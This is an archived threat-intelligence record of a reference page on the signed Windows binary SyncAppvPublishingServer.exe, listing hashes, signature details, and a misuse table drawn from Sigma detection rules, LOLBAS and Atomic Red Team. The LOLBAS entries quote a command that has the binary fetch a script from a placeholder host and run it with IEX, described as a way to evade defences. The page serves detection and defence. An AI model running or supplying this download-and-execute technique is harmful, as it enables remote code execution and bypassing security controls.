{
	"id": "a825d061-3c21-430e-8e54-44b49c3377be",
	"created_at": "2026-04-06T00:17:52.706735Z",
	"updated_at": "2026-04-10T03:21:27.091075Z",
	"deleted_at": null,
	"sha1_hash": "7d72989f91cff521db7251697897bf708c0dafde",
	"title": "SyncAppvPublishingServer.exe | Microsoft Application Virtualization Sync Utility",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 127733,
	"plain_text": "SyncAppvPublishingServer.exe | Microsoft Application Virtualization\r\nSync Utility\r\nArchived: 2026-04-05 20:18:16 UTC\r\nSyncAppvPublishingServer.exePermalink\r\nFile Path: C:\\Windows\\system32\\SyncAppvPublishingServer.exe\r\nDescription: Microsoft Application Virtualization Sync Utility\r\nHashesPermalink\r\nType Hash\r\nMD5 3C291419F60CDF9C2E4E19AD89944FA3\r\nSHA1 0B6D803C876B6313CE08A79B2A98F6E3BAC97689\r\nSHA256 53A78D6C3D05552E616897712D0D16BF14D0030AF2BB367841B6AECC883FF218\r\nSHA384 D7A55317A767950F5682573888B9156EFCB9F7BD73D44A61FAD253B6BBCB9785E56AE0F8B87009CEF5047091D6F61562\r\nSHA512 587B9BC171988CB41E3A0B19AB7A242DB23D070F70429F8061D095C1CB142498E8A6239004055C83439E6AD4EE52735F9BF97C3145622D0CF710214020\r\nSSDEEP 768:G6FyyphiE9jr4jwmp3PwysQdwRUuKs27cRg1Pb7aJGgZ:G6t9jrN8P3sQOUwSuYPSJGI\r\nIMP 1EC41853BAB928648731DDAB143F3159\r\nPESHA1 EB4A6346C6342096471F65E6402E29B99ECEC8CF\r\nPE256 960CDC3E9C992799BF8FB7A29EB592C492079DA0F5CE562BA0261C509E4D1E08\r\nRuntime DataPermalink\r\nLoaded Modules:Permalink\r\nPath\r\nC:\\Windows\\System32\\combase.dll\r\nC:\\Windows\\System32\\GDI32.dll\r\nC:\\Windows\\System32\\gdi32full.dll\r\nC:\\Windows\\System32\\KERNEL32.DLL\r\nC:\\Windows\\System32\\KERNELBASE.dll\r\nC:\\Windows\\System32\\msvcp_win.dll\r\nC:\\Windows\\SYSTEM32\\ntdll.dll\r\nC:\\Windows\\System32\\ole32.dll\r\nC:\\Windows\\System32\\RPCRT4.dll\r\nC:\\Windows\\System32\\SHELL32.dll\r\nC:\\Windows\\system32\\SyncAppvPublishingServer.exe\r\nC:\\Windows\\System32\\ucrtbase.dll\r\nC:\\Windows\\System32\\USER32.dll\r\nC:\\Windows\\System32\\win32u.dll\r\nSignaturePermalink\r\nStatus: Signature verified.\r\nSerial: 33000002EC6579AD1E670890130000000002EC\r\nhttps://strontic.github.io/xcyclopedia/library/SyncAppvPublishingServer.exe-3C291419F60CDF9C2E4E19AD89944FA3.html\r\nPage 1 of 5\n\nThumbprint: F7C2F2C96A328C13CDA8CDB57B715BDEA2CBD1D9\r\nIssuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, 
S=Washington,\r\nC=US\r\nSubject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US\r\nOriginal Filename: syncappvpublishingserver.exe\r\nProduct Name: Microsoft Windows Operating System\r\nCompany Name: Microsoft Corporation\r\nFile Version: 10.0.19041.1320 (WinBuild.160101.0800)\r\nProduct Version: 10.0.19041.1320\r\nLanguage: English (United States)\r\nLegal Copyright: Microsoft Corporation. All rights reserved.\r\nMachine Type: 64-bit\r\nFile Scan\r\nVirusTotal Detections: Unknown\r\nFile Similarity (ssdeep match)\r\nFile Score\r\nC:\\Windows\\system32\\SyncAppvPublishingServer.exe 49\r\nC:\\Windows\\system32\\SyncAppvPublishingServer.exe 49\r\nPossible Misuse\r\nThe following table contains possible examples of SyncAppvPublishingServer.exe being misused. While\r\nSyncAppvPublishingServer.exe is not inherently malicious, its legitimate functionality can be abused for malicious\r\npurposes.\r\nSource Source File Example\r\nsigma powershell_syncappvpublishingserver_exe.yml\r\ntitle: SyncAppvPublishingServer Execution to Bypas\r\nPowershell Restriction\r\nsigma powershell_syncappvpublishingserver_exe.yml\r\ndescription: Detects SyncAppvPublishingServer proc\r\nexecution which usually utilized by adversaries to\r\nPowerShell execution restrictions.\r\nsigma powershell_syncappvpublishingserver_exe.yml\r\n- https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishin\r\nsigma powershell_syncappvpublishingserver_exe.yml - 'SyncAppvPublishingServer.exe'\r\nsigma process_creation_syncappvpublishingserver_exe.yml\r\ntitle: SyncAppvPublishingServer Execution to Bypas\r\nPowershell Restriction\r\nsigma process_creation_syncappvpublishingserver_exe.yml\r\ndescription: Detects SyncAppvPublishingServer proc\r\nexecution which usually utilized by adversaries to\r\nPowerShell execution restrictions.\r\nsigma process_creation_syncappvpublishingserver_exe.yml\r\n- 
https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishin\r\nsigma process_creation_syncappvpublishingserver_exe.yml Image\\|endswith: '\\SyncAppvPublishingServer.exe'\r\nsigma image_load_in_memory_powershell.yml - '\\syncappvpublishingserver.exe'\r\nsigma posh_pm_syncappvpublishingserver_exe.yml\r\ntitle: SyncAppvPublishingServer Execution to Bypas\r\nPowershell Restriction\r\nsigma posh_pm_syncappvpublishingserver_exe.yml\r\ndescription: Detects SyncAppvPublishingServer proc\r\nexecution which usually utilized by adversaries to\r\nPowerShell execution restrictions.\r\nsigma posh_pm_syncappvpublishingserver_exe.yml\r\n- https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishin\r\nsigma posh_pm_syncappvpublishingserver_exe.yml ContextInfo\\|contains: 'SyncAppvPublishingServer.e\r\nsigma posh_ps_syncappvpublishingserver_exe.yml\r\ntitle: SyncAppvPublishingServer Execution to Bypas\r\nPowershell Restriction\r\nsigma posh_ps_syncappvpublishingserver_exe.yml\r\ndescription: Detects SyncAppvPublishingServer proc\r\nexecution which usually utilized by adversaries to\r\nPowerShell execution restrictions.\r\nsigma posh_ps_syncappvpublishingserver_exe.yml\r\n- https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishin\r\nsigma posh_ps_syncappvpublishingserver_exe.yml ScriptBlockText\\|contains: 'SyncAppvPublishingServ\r\nsigma proc_creation_win_syncappvpublishingserver_execute_powershell.yml\r\ntitle: SyncAppvPublishingServer Execute Arbitrary\r\nPowerShell Code\r\nsigma proc_creation_win_syncappvpublishingserver_execute_powershell.yml\r\ndescription: Executes arbitrary PowerShell code us\r\nSyncAppvPublishingServer.exe.\r\nsigma proc_creation_win_syncappvpublishingserver_execute_powershell.yml\r\n- https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishin\r\nsigma 
proc_creation_win_syncappvpublishingserver_execute_powershell.yml Image\\|endswith: '\\SyncAppvPublishingServer.exe'\r\nsigma proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml\r\ntitle: SyncAppvPublishingServer VBS Execute Arbitr\r\nPowerShell Code\r\nsigma proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml\r\ndescription: Executes arbitrary PowerShell code us\r\nSyncAppvPublishingServer.vbs\r\nsigma proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml\r\n- https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishin\r\nsigma proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml - '\\SyncAppvPublishingServer.vbs'\r\nLOLBAS Syncappvpublishingserver.yml Name: SyncAppvPublishingServer.exe\r\nLOLBAS Syncappvpublishingserver.yml\r\n- Command: SyncAppvPublishingServer.exe \"n;(New-Ob\r\nNet.WebClient).DownloadString('http://some.url/scri\r\n\\| IEX\"\r\nLOLBAS Syncappvpublishingserver.yml\r\nUsecase: Use SyncAppvPublishingServer as a Powersh\r\nto execute Powershell code. 
Evade defensive counter\r\nmeasures\r\nLOLBAS Syncappvpublishingserver.yml - Path: C:\\Windows\\System32\\SyncAppvPublishingServ\r\nLOLBAS Syncappvpublishingserver.yml - Path: C:\\Windows\\SysWOW64\\SyncAppvPublishingServ\r\nLOLBAS Syncappvpublishingserver.yml\r\n- IOC: SyncAppvPublishingServer.exe should never b\r\nunless App-V is deployed\r\nLOLBAS Syncappvpublishingserver.yml Name: Syncappvpublishingserver.vbs\r\nLOLBAS Syncappvpublishingserver.yml\r\n- Command: SyncAppvPublishingServer.vbs \"n;((New-O\r\nNet.WebClient).DownloadString('http://some.url/scri\r\n\\| IEX\"\r\nLOLBAS Syncappvpublishingserver.yml - Path: C:\\Windows\\System32\\SyncAppvPublishingServ\r\natomic-red-team index.md - Atomic Test #2: SyncAppvPublishingServer - Execute a\r\nPowerShell code [windows]\r\natomic-red-team\r\nindex.md\r\n- Atomic Test #1: SyncAppvPublishingServer Signed Scr\r\nPowerShell Command Execution [windows]\r\natomic-red-team\r\nwindows-index.md\r\n- Atomic Test #2: SyncAppvPublishingServer - Execute a\r\nPowerShell code [windows]\r\natomic-red-team\r\nwindows-index.md\r\n- Atomic Test #1: SyncAppvPublishingServer Signed Scr\r\nPowerShell Command Execution [windows]\r\natomic-red-team\r\nT1216.md\r\n- Atomic Test #1 - SyncAppvPublishingServer Signed Sc\r\nPowerShell Command Execution\r\natomic-red-team\r\nT1216.md\r\n## Atomic Test #1 - SyncAppvPublishingServer Signed S\r\nPowerShell Command Execution\r\natomic-red-team\r\nT1216.md\r\nExecutes the signed SyncAppvPublishingServer script wi\r\noptions to execute an arbitrary PowerShell command.\r\natomic-red-team\r\nT1216.md\r\nC:\\windows\\system32\\SyncAppvPublishingServer.vbs “\\n\r\n{command_to_execute}”\r\natomic-red-team\r\nT1218.md\r\n- Atomic Test #2 - SyncAppvPublishingServer - Execute\r\nPowerShell code\r\natomic-red-team\r\nT1218.md\r\n## Atomic Test #2 - 
SyncAppvPublishingServer - Execut\r\narbitrary PowerShell code\r\natomic-red-team\r\nT1218.md\r\nExecutes arbitrary PowerShell code using\r\nSyncAppvPublishingServer.exe. Requires Windows 10.\r\natomic-red-team T1218.md SyncAppvPublishingServer.exe “n; #{powershell_code}”\r\nMIT License. Copyright (c) 2020-2021 Strontic.\r\nSource: https://strontic.github.io/xcyclopedia/library/SyncAppvPublishingServer.exe-3C291419F60CDF9C2E4E19AD89944FA3.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://strontic.github.io/xcyclopedia/library/SyncAppvPublishingServer.exe-3C291419F60CDF9C2E4E19AD89944FA3.html"
	],
	"report_names": [
		"SyncAppvPublishingServer.exe-3C291419F60CDF9C2E4E19AD89944FA3.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434672,
	"ts_updated_at": 1775791287,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7d72989f91cff521db7251697897bf708c0dafde.pdf",
		"text": "https://archive.orkl.eu/7d72989f91cff521db7251697897bf708c0dafde.txt",
		"img": "https://archive.orkl.eu/7d72989f91cff521db7251697897bf708c0dafde.jpg"
	}
}